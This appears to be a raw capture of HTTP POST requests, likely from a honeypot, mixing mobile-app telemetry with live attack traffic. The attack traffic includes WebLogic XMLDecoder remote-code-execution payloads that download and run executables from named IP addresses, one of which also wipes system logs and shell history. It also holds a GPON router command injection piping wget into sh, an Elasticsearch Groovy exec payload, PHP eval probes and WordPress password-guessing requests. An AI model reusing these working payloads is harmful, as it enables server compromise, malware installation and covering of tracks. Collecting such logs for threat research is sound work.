--PFuC6xHGc4GVu-Ugcqubf053LZjzVlIoFTqhJV
Content-Disposition: form-data; name="data"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
{"module":"sdk_preferences","mcc":"510","sdkver":"1.14","appname":"iswipe","did":"6ccc52a8048214f","modulever":"5","language":"in_ID","channel":"2010002546"}
--PFuC6xHGc4GVu-Ugcqubf053LZjzVlIoFTqhJV--
POST /sheep.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 44
m=die('Hello, Peppa!'.(string)(111111111*9))
POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 21
Cache-Control: no-cache
log=admin&pwd=5555555
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36
Content-Length: 577
Content-Type: text/xml; charset=UTF-8
Accept-Encoding: gzip
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8" class="java.beans.XMLDecoder">
<void id="url" class="java.net.URL">
<string>http://217.147.169.230:4444/cve-2017-10271?target=http%3A%2F%2F64.137.220.18%3A7001%2Fwls-wsat%2FCoordinatorPortType</string>
</void>
<void idref="url">
<void id="stream" method = "openStream" />
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 388
Cache-Control: no-cache
RPRbw4ucZC/3k8Rd2R7pcCQvKQhyHrd4bnSKOjdXcxOABQghTC6XhiYXv0Hw28vZBro5scEfh+euaj90iNFaG0H0yfpxR0WOSVarcDOD/r29QmNr46hi3OntdwKX84pfwbn6mneEDoeDDOc0z5acCJw4ldscK8Bhjp126J8yncrJykuD/KuqUZnsJaJF0ikxP/kzK9EejpcsQd127f07rp12ol9YN598Ct2+J8SFHoTwgd0P33ZS+KuMN9kGnI4N7lXkQgDxTZ7nPM4i+VHMlUUKcrWSYwj4JrhIKKgog/8Ehm6CumwRWQ7YV5gpbsBzw3ohlfDdadIQp+9yCNBukA/pDCLvw04Ik+yMGb4JzJuhzFfiTJ/gfdUh+IFYUmJj/BM=
POST http://behacdn.ksmobile.net/cpsn HTTP/1.1
Accept-Encoding: gzip
Charset: UTF-8
Content-Type: multipart/form-data; boundary=----------------------------7d92221b604bc
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: behacdn.ksmobile.net
Connection: Keep-Alive
Content-Length: 126
~˜ÚUBÍÕ`i+nC\KlE^Sz]#[@^zZr^kZ&=0OoBcpjGUìGË¥å€TªuN’ôÅ,` ôÑ_≠åAˇ∑YñZ–æ≈7C#‹,ïr?£^·+6:î '@˚g¶“IH®ë®Ës‚f´õü˘5É√F˝¸∏∫è
POST http://behacdn.ksmobile.net/cpsn HTTP/1.1
Accept-Encoding: gzip
Charset: UTF-8
Content-Type: multipart/form-data; boundary=----------------------------7d92221b604bc
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: behacdn.ksmobile.net
Connection: Keep-Alive
Content-Length: 558
POST http://cfg.cml.ksmobile.com/post HTTP/1.1
Accept-Encoding: gzip
Content-Length: 1051
Content-Type: multipart/form-data; boundary=2nfK6zvg2bn6zCMGTcFK3IFLxqOXQs-BkdV
Host: cfg.cml.ksmobile.com
Connection: Keep-Alive
--2nfK6zvg2bn6zCMGTcFK3IFLxqOXQs-BkdV
Content-Disposition: form-data; name="protocver"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
1
--2nfK6zvg2bn6zCMGTcFK3IFLxqOXQs-BkdV
Content-Disposition: form-data; name="ran"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
525117
--2nfK6zvg2bn6zCMGTcFK3IFLxqOXQs-BkdV
Content-Disposition: form-data; name="sig"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
7f808f8f6ed0d07bbc948d963ae91aae
--2nfK6zvg2bn6zCMGTcFK3IFLxqOXQs-BkdV
Content-Disposition: form-data; name="flag"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
0
--2nfK6zvg2bn6zCMGTcFK3IFLxqOXQs-BkdV
Content-Disposition: form-data; name="data"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
{"module":"sdk_preferences","mcc":"510","sdkver":"1.14","appname":"iswipe","did":"6ccc52a8048214f","modulever":"5","language":"in_ID","channel":"2010002546"}
--2nfK6zvg2bn6zCMGTcFK3IFLxqOXQs-BkdV--
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Content-Type: text/xml
Accept: text/html, application/xhtml+xml, */*
Accept-Encoding: gbk, GB2312
Accept-Language: zh-cn
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Upgrade-Insecure-Requests: 1
Content-Length: 848
Host: x.x.x.x:7001
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>cmd</string>
</void>
<void index="1">
<string>/c</string>
</void>
<void index="2">
<string>powershell (new-object System.Net.WebClient).DownloadFile('http://a46.bulehero.in/downloader.exe','C:/Windows/temp/wlanexts.exe');start C:/Windows/temp/wlanexts.exe</string>
</void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
POST /w.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 48
leng=die('Hello, Peppa!'.(string)(111111111*9));
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Åa‰ÃÃ≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞-Y›∆√«∆fl
POST /app_logs HTTP/1.1
X-Umeng-UTC: 1477853105363
X-Umeng-Sdk: Android/5.6.7 live.ly%2F3.3+GT-N8013%2F6.0.1+0C1D8E62E7F766B118C17CFA99A28899
Msg-Type: envelope
Transfer-Encoding: chunked
Content-Type: application/x-www-form-urlencoded
User-Agent: Dalvik/2.1.0 (Linux; U; Android 6.0.1; GT-N8013 Build/MOB30J)
Host: alog.umeng.co
Connection: Keep-Alive
Accept-Encoding: gzip
POST http://check.proxyradar.com/azenv.php?auth=149298820203&a=PSCMN&i=2335908067&p=8080 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close
testPost=true
POST http://f2.doodlemobile.com/feature_server/geo-ip/test.php HTTP/1.1
Content-Length: 0
Content-Type: application/x-www-form-urlencoded
Host: f2.doodlemobile.com
Connection: Keep-Alive
POST http://cfg.cml.ksmobile.com/post HTTP/1.1
Accept-Encoding: gzip
Content-Length: 1019
Content-Type: multipart/form-data; boundary=twaTEysZTv2ahyApbwoKlofZ2m5JYr
Host: cfg.cml.ksmobile.com
Connection: Keep-Alive
--twaTEysZTv2ahyApbwoKlofZ2m5JYr
Content-Disposition: form-data; name="protocver"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
1
--twaTEysZTv2ahyApbwoKlofZ2m5JYr
Content-Disposition: form-data; name="ran"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
357717
--twaTEysZTv2ahyApbwoKlofZ2m5JYr
Content-Disposition: form-data; name="sig"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
e544caf2fd7e6a8cfe2c9fd97ae39786
--twaTEysZTv2ahyApbwoKlofZ2m5JYr
Content-Disposition: form-data; name="flag"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
0
--twaTEysZTv2ahyApbwoKlofZ2m5JYr
Content-Disposition: form-data; name="data"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
{"module":"searchengine","mcc":"510","sdkver":"1.14","appname":"iswipe","did":"6ccc52a8048214f","modulever":"39","language":"in_ID","channel":"2010002546"}
--twaTEysZTv2ahyApbwoKlofZ2m5JYr--
POST http://check.proxyradar.com/azenv.php?auth=149660222439&a=PSCMN&i=2335900298&p=8080 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close
testPost=true
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Å∏ÏÕËÃ≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞î;;Y›∆√«∆fl
POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 26
Cache-Control: no-cache
log=jamesatchue&pwd=777777
POST http://t3.proxy-checks.com/favicon.ico HTTP/1.1
Host: t3.proxy-checks.com
Proxy-Connection: Keep-Alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618)
Accept-Language: en-US;q=0.6,en;q=0.4
Content-Length: 0
Pragma: no-cache
POST http://alog.umeng.com/app_logs HTTP/1.1
X-Umeng-UTC: 1496019332806
X-Umeng-Sdk: Android/6.0.9 Block+Puzzle+Jewel%2F18+MI+4LTE%2F4.4.4+51CDA60BD75DD94418ADE9CC4CEEE046
Msg-Type: envelope/json
Content-Type: envelope/json
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: alog.umeng.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 2363
POST http://profile.adkmob.com/ud/ HTTP/1.1
Content-Length: 230
Content-Type: text/plain; charset=ISO-8859-1
Host: profile.adkmob.com
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; MI 4LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
v=16&ac=50&pos=34100&mid=104&lan=in_ID&ext=&cmver=51424845&mcc=510&mnc=10&pl=2&channelid=2010002546&lp=0&gaid=8776479c-11a4-48e7-8a70-96e640a29187&aid=6ccc52a8048214f&attach=[{"res":0,"pkg":"com.screensaver.ad","des":"","sug":-1}]
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Å«™›^Ã≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îVJY›∆√«∆fl
POST /w.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 32
leng=die((string)(111111111*9));
POST http://check.proxyradar.com/azenv.php?auth=152330914303&a=PSCMN&i=1082776598&p=80 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close
testPost=true
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1214
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 372
Cache-Control: no-cache
Q6AIlNmbNoK6kIEezX/6R/U61tknzWvQEQPUGNa0I3E7eQ6955NGo6z+GYxdSISP4Lfdbl+UGmDGvAcAsbZ1PByEKnFJrN0txmVZxu9On7WdZAHaXicYrmBwW3K/LHpFst3ncLo5Iut5ZKfNiWM6H7qql64Yfjx0D03tiEdoFcTwjqnIoGIGspOdGXc/Ft7T7IqFo+7UMMfMAqRRqz/ESN0EqKwhU+O1UEj3+lFaXEYtwyT2FYG6Dzuv6ZRGJSQ7emG1WZJYeNpl19rnundteeTS1p2sgj6eDiQo7TLsCzumkzC4rwrMLTbcBPnq5MZ9laJWljXhwQzwZMpb9gVuAWzAwM+4JQ5dXOw2Q6PbYGAf0qdICwjx
POST http://ssdk.adkmob.com/rp/ HTTP/1.1
Content-Length: 231
Content-Type: text/plain; charset=ISO-8859-1
Host: ssdk.adkmob.com
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; MI 4LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
v=17&ac=50&pos=34106&mid=104&lan=in_ID&ext=&cmver=51424845&mcc=510&mnc=10&pl=2&channelid=2010002546&lp=0&gaid=8776479c-11a4-48e7-8a70-96e640a29187&aid=6ccc52a8048214f&attach=[{"res":3003,"pkg":"com.mopub.native","des":"","sug":-1}]
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 412
Cache-Control: no-cache
E/EIld3MYhaTslWqg98m7BaaxcpoOvg1AW3+VuXXdshFg86qNNnxPeIMTzf9q4+Gtewc8WHDt7Swa+TnhbImSvWtUmIkXiwsUgzf4XkdExf1mScbNabk+/lL5IEzwbC4G9qdH/FowZ9p1qnlCYS/jkfnjkE8cG+vBqe5zxDA69/8O2xjPobCTNN61LMV7ZysFOO1+Jjzhmqi3yJywZmX9cARZnfwqP18zQeB2a3ETF+yqUd+nUO+AxCpcp5ovW8m7b7ktLZNm/9lAzf3IwaoSClwa3UyJjGc1svv+rw5ssvE4nPUPuRYjkyUWXxCfGnywe+eDUN9vh5wh+MXSdPi7K3PFlxnXEGe/SYcXFltI/+ZSC8oJQgxWqLq6YVmGsioaaJv6bCIHDpEm0pnG5xXCkDtg8JV
POST /wls-wsat/ParticipantPortType HTTP/1.1
Host: x.x.x.x:7001
Content-Length: 2547
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.9.1
Connection: keep-alive
content-type: text/xml
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_151" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3"> <void index = "0"> <string>cmd</string> </void> <void index = "1"> <string>/c</string> </void> <void index = "2"> <string>cmd.exe /c &quot;echo Set objXMLHTTP=CreateObject(&quot;MSXML2.XMLHTTP&quot;)&gt;C:/Windows/System32/getpocc.vbs&amp;@echo objXMLHTTP.open &quot;GET&quot;,&quot;http://198.50.179.109:8020/taskhostxz.exe&quot;,false&gt;&gt;C:/Windows/System32/getpocc.vbs&amp;@echo objXMLHTTP.send()&gt;&gt;C:/Windows/System32/getpocc.vbs&amp;@echo If objXMLHTTP.Status=200 Then&gt;&gt;C:/Windows/System32/getpocc.vbs&amp;@echo Set objADOStream=CreateObject(&quot;ADODB.Stream&quot;)&gt;&gt;C:/Windows/System32/getpocc.vbs&amp;@echo objADOStream.Open&gt;&gt;C:/Windows/System32/getpocc.vbs&amp;@echo objADOStream.Type=1 &gt;&gt;C:/Windows/System32/getpocc.vbs&amp;@echo objADOStream.Write objXMLHTTP.ResponseBody&gt;&gt;C:/Windows/System32/getpocc.vbs&amp;@echo objADOStream.Position=0 &gt;&gt;C:/Windows/System32/getpocc.vbs&amp;@echo objADOStream.SaveToFile &quot;C:/Windows/System32/taskhostxz.exe&quot;&gt;&gt;C:/Windows/System32/getpocc.vbs&amp;@echo objADOStream.Close&gt;&gt;C:/Windows/System32/getpocc.vbs&amp;@echo Set objADOStream=Nothing&gt;&gt;C:/Windows/System32/getpocc.vbs&amp;@echo End if&gt;&gt;C:/Windows/System32/getpocc.vbs&amp;@echo Set objXMLHTTP=Nothing&gt;&gt;C:/Windows/System32/getpocc.vbs&amp;@echo Set objShell=CreateObject(&quot;WScript.Shell&quot;)&gt;&gt;C:/Windows/System32/getpocc.vbs&amp;@echo objShell.Exec(&quot;C:/Windows/System32/taskhostxz.exe&quot;)&gt;&gt;C:/Windows/System32/getpocc.vbs&amp;cscript.exe C:/Windows/System32/getpocc.vbs&quot;</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/></soapenv:Envelope>
POST http://api.device.xiaomi.net/api/user/device/setting HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Cookie: serviceToken=oi/auDVRQ0HDLoTc90F1cgihAZ334eWaQPM61lxIqaMCOFcxIv+M+Qm96mL4TwAL1hH+5y7pGNUF67O4Qz59ZMI+i8HOwIsBYUitruC/ixFPPhlRNIAEdDF7lnxY7hUi+8is2r2ZDkJcUsFobL0NfwZ273zfLh1R3GI6Q9+UCvCJFCmE6Q0y/ud/YYZ9OkRjz1rbJaJgFHTFLrZWVArlvQ==; cUserId=UmHQgtJ2PWdwXIYZq1PwDfYMMzY
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: api.device.xiaomi.net
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 210
devId=otYzHJYP%2BGN0su3hwqld0bZ%2FQqc1EJiz3Wgrazt405w%3D&content=VREOWkPe%2Fj9pu3g5S3PCOjy1XDqrAyHpR3Qs5UjvdYUr89m6C8lYB%2Fd7dsLf0Dzr&signature=fJhNQjXIOX2xv1nJp9jxiAR8Vf0%3D&userId=sG4wD14mVIEUlpt3sFsx6Q%3D%3D
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 436
Cache-Control: no-cache
E6AMyd2ZNWFzLdKBlnuS0AiowViPtgHBB9G4aln0+TTdOPvtH91M3+EJd5jV+Bv8XBrRE9N1ocuPSWjPSewlQL1jSRmYfqzht5VVVfmRGOqU0onx3rbPO8bcq4UJr9uf2I1XRjDdt2PQEnFSdAhOctdbqFnefnpzZ6DeFgOCf6PoJUMespSYjlXWyvzAUlS7TDtOMMsNy4QIlj6+dgi4hZ5rqrbECHwYMg0Zr5W5obJmWgwWSWPQIfC/k3E2kjyZNEIPwNbHTXVNaUMsC3fwp1ylqY9kVZlP5yKiTp31Y+Lve1NXgNl9aTlMRXwtXRVvtigx7ZBbIbbj58snr1De3dFNTn5JM3ifUQeVqeLJbbyRvdiNNCO1eA1e3ktMb47oqR5j92cOQLHaBq+SKgMUPevv1iPq6vuBkLbCDJcEjqaP7ss9U/+Y
POST /_search/ HTTP/1.1
Accept: */*
Referer: http://x.x.x.x:9200/_search/
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: x.x.x.x:9200
Content-Length: 451
Cache-Control: no-cache
{
"size":1,
"script_fields": {
"secpulse": {
"script":"java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"id\").getInputStream())).readLines()",
"lang": "groovy"
}
}
}
POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 29
Cache-Control: no-cache
log=admin&pwd=jamesatchue9999
POST /GponForm/diag_Form?images/ HTTP/1.1
Host: x.x.x.x:8080
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Hello, World
Content-Length: 118
XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://185.62.190.191/r+-O+->/tmp/r;sh+/tmp/r&ipv=0
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 432
Cache-Control: no-cache
FvZYyd3BNSM7tiCwYGZLMe991qFXOyGy6THE1Alz3qWCP4MBigQeLiHvZrnH5c3l+XN1myNE2FQfNo7ZO7qo3GrNS9M/smT7i+vcSetM8fMlcACH7tYTGTpzWD7ycclp4oZC1LvJO6OCJF53y60pA6xuM9HYKuHdbKJTM17ViDzIta/IuxQ53BnMC8wCEYNQ0sx4VWvRqVLOqEWVnP/H4334+Qt791NkX97RYjYFBezvQeT0bJMAX/yLNtMT+aVCKKUqS9V3lSch8SGKeQjiyJgS1xWtznPwwE73cqXF2ERBN64CzPrvcG97ZVkl0LXWBqK5MyCeydN3NJkYja5YYKtgfO3o+crWbjtG55ri9eRVvt06CQQ+doqdVRmx2x+1LYY4QEGw8Sph1eQmIkWbmWsrp6geYGVEWhF+nGlQ1D9XKX0=
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 360
Cache-Control: no-cache
CF+zn3wSWS0hIgBgL3aCHasy6JOPeXN80isy15qE+tUUeK5WQdG0OG1X6aAU2xRnGhRVmasoXeisO6vlurMD+dxr5QEXB/FawtPjNVQcea5ewdC9MbvziO5Pcpd3B/tHlM0yIcuNwSJruI/ecvMAQu9hEfPexMYFgdQz9ifO4Xd+NhWoTZEyi7Jx5J0CerjTu8XQ58crYljRMKoe2rT1UL9jcGx4TPvsiyG2xKU1yPOaYCagz1uwOd99R3FL2QTJb4nqpcOO0/VEEKLsHzRPRdTW/pYgmd8x71HLbkJfM2/wAmJlrfpSU0pIXhD2aTDGj/ZZnDXzyJT6gK5nite8EliMI6y3HHQo8jI2Tg==
POST /db_session.init.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 48
eval=die('Hello, Peppa!'.(string)(111111111*9));
POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 26
Cache-Control: no-cache
log=jamesatchue&pwd=!@#123
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36
Content-Length: 576
Content-Type: text/xml; charset=UTF-8
Accept-Encoding: gzip
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8" class="java.beans.XMLDecoder">
<void id="url" class="java.net.URL">
<string>http://217.147.169.230:4444/cve-2017-10271?target=http%3A%2F%2F45.62.241.10%3A7001%2Fwls-wsat%2FCoordinatorPortType</string>
</void>
<void idref="url">
<void id="stream" method = "openStream" />
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
POST /script HTTP/1.1
Referer: http://x.x.x.x:8080/script
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 2Pac; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: x.x.x.x:8080
Content-Length: 0
Cache-Control: no-cache
POST /xw.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
h=die((string)(111111111*9));
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
ÅΩV7Ã≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞î¶5%Y›∆√«∆fl
POST http://hoodrunner.kiloo.com/hr_dailyquests2.php HTTP/1.1
X-Unity-Version: 4.6.5f1
Content-Type: application/x-www-form-urlencoded
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: hoodrunner.kiloo.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 12
key=CXIV95CX
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
ÅNà§Ã≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·
∞îê˜Y›∆√«∆fl
POST /wls-wsat/ParticipantPortType HTTP/1.1
Host: x.x.x.x:7001
Content-Length: 1673
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.9.1
Connection: keep-alive
content-type: text/xml
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_151" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3"> <void index = "0"> <string>cmd</string> </void> <void index = "1"> <string>/c</string> </void> <void index = "2"> <string>unset; rm -rf /var/run/utmp /var/log/wtmp /var/log/lastlog /var/log/messages /var/log/secure /var/log/xferlog /var/log/maillog; touch /var/run/utmp /var/log/wtmp /var/log/lastlog /var/log/messages /var/log/secure /var/log/xferlog /var/log/maillog; unset HISTFILE; unset HISTSAVE; unset HISTLOG; history -n; unset WATCH; export HISTFILE=/dev/null; export HISTFILE=/dev/null; wget http://93.174.93.149/logo8.sh -O /tmp/logo8.sh; curl -o /tmp/logo8.sh http://93.174.93.149/logo8.sh; lwp-download http://93.174.93.149/logo8.sh /tmp/logo8.sh; bash /tmp/logo8.sh; rm -rf /tmp/logo8.sh; history -c</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/></soapenv:Envelope>
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
